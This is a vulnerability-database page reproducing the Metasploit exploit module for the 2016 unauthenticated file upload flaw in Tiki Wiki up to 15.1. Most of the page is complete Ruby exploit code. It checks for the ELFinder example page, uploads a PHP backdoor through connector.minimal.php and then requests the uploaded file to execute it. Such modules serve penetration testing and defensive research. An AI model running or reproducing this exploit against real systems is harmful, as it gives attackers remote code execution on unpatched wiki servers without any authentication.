Lucene search

K

Tiki Wiki Unauthenticated File Upload Vulnerability

🗓️ 11 Jul 2016 19:07:44Reported by Mehmet Ince <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 16 Views

Tiki Wiki Unauthenticated File Upload Vulnerabilit

Show more
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Tiki Wiki Unauthenticated File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a file upload vulnerability in Tiki Wiki <= 15.1
        which could be abused to allow unauthenticated users to execute arbitrary code
        under the context of the web server user.

        The issue comes with one of the 3rd party components. Name of that component is
        ELFinder -version 2.0-. This component comes with default example page which
        demonstrates file operations such as upload, remove, rename, create directory etc.
        Default configuration does not force validations such as file extension, content-type etc.
        Thus, unauthenticated user can upload PHP file.

        The exploit has been tested on Debian 8.x 64-bit and Tiki Wiki 15.1.
      },
      'Author'         =>
        [
          'Mehmet Ince <[email protected]>' # Vulnerability discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'https://www.mehmetince.net/exploit/tiki-wiki-unauthenticated-file-upload-vulnerability' ],
          [ 'URL', 'https://tiki.org/article434-Security-update-Tiki-15-2-Tiki-14-4-and-Tiki-12-9-released' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Targets'        => [ ['Automatic', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2016-07-11'
      ))

      register_options(
        [
          OptString.new('TARGETURI', [ true, "Installed path of Tiki Wiki", "/tiki/"])
        ])
  end

  def check
    url = normalize_uri(target_uri.path, "vendor_extra/elfinder/elfinder.html")
    res = send_request_cgi(
        'method'  => 'GET',
        'uri'     =>  url
    )

    if res && res.code == 200
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    filename = rand_text_alpha(8 + rand(4)) + '.php'
    register_file_for_cleanup(filename)

    data = Rex::MIME::Message.new
    data.add_part('upload', nil, nil, 'form-data; name="cmd"')
    data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")

    print_status("Uploading backdoor file: #{filename}")

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, "vendor_extra/elfinder/php/connector.minimal.php"),
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s
     })

    if res && res.code == 200
      print_good("Backdoor successfully created.")
    else
      fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
    end

    print_status("Trigging the exploit...")
    send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path, "vendor_extra/elfinder/files/" + filename)
     }, 5)
  end
end

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo